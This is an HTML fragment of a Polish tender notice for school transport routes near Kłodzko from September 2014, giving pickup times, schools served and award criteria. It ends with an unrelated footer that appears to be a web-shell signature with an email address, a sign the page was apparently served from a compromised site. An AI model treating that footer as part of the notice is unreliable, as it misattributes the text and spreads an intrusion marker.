<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II - DOWÓZ ZAMKNIĘTY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz i odwóz uczniów do Zespołu Szkół Specjalnych w Kłodzku z miejscowości: Krosnowice, Marcinów, Żelazno do Zespołu Szkół Integracyjnych im. Jana Pawła II w Kłodzku z miejscowości: Marcinów, Krosnowice, Ołdrzychowice, do Przedszkola Gminnego z Oddziałami Integracyjnymi w Bierkowicach 
z miejscowości: Ołdrzychowice.


Charakterystykę powyższego zadania stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 
 UWAGA na trasie I uczniowie wsiadają rano o godzinie 7:20, koniec trasy Zespół Szkół Integracyjnych w Kłodzku godzina 7:50
na trasie II uczniowie wsiadają rano o godzinie 7:05 koniec trasy Przedszkole Gminne 
z działami Integracyjnymi w Bierkowicach godzina 7:55..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE III - ZAKUP BILETÓW MIESIĘCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla uczniów zamieszkałych w Boguszynie 

Do Zespołu Szkół Integracyjnych im. Jana Pawła II w Kłodzku przy ul. Zamiejskiej 24 - szkoły podstawowej i gimnazjum. 
Do Gimnazjum Publicznego im. Wł. St. Reymonta w Kłodzku.  


Charakterystykę powyższych zadań stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 
Rozpoczęcie zajęć lekcyjnych w w/w jednostkach oświatowych o godz. 800  ,
   zakończenie zajęć lekcyjnych: 	około 13 25 w szkole podstawowej, 
około 14 15 w gimnazjum.

 UWAGA	uczniowie wsiadają rano najwcześniej o godzinie 7.00
		uczniów należy dowieźć do w/w jednostek do godz. 7 45, 
            	odwóz uczniów po zajęciach lekcyjnych około godz. 14 25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE IV  DOWÓZ ZAMKNIĘTY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowóz uczniów niepełnosprawnych, w tym ucznia niepełnosprawnego ruchowo poruszającego się na wózku inwalidzkim z miejscowości Święcko do Niepublicznej Szkoły Podstawowej Specjalnej przy Domu Pomocy Społecznej dla Dzieci w Ludwikowicach Kłodzkich. 


 UWAGA uczniowie wsiadają rano najwcześniej o godzinie 7.00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com